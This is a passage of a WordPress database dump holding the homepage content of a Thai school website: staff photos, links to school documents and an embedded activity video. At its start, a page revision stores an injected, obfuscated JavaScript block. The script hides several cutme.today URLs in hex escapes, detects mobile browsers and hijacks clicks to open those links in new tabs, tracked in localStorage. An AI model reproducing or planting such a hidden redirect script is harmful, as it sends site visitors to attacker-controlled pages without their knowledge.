ent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-10-26 16:31:06','2025-10-26 09:31:06','',19,'http://watprato.ssk.in.th/?p=743',0,'revision','',0),
(744,1,'2025-10-26 16:32:19','2025-10-26 09:32:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\",\"align\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"fontSize\":\"x-large\"} -->\n<p class=\"has-text-align-center has-x-large-font-size\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image 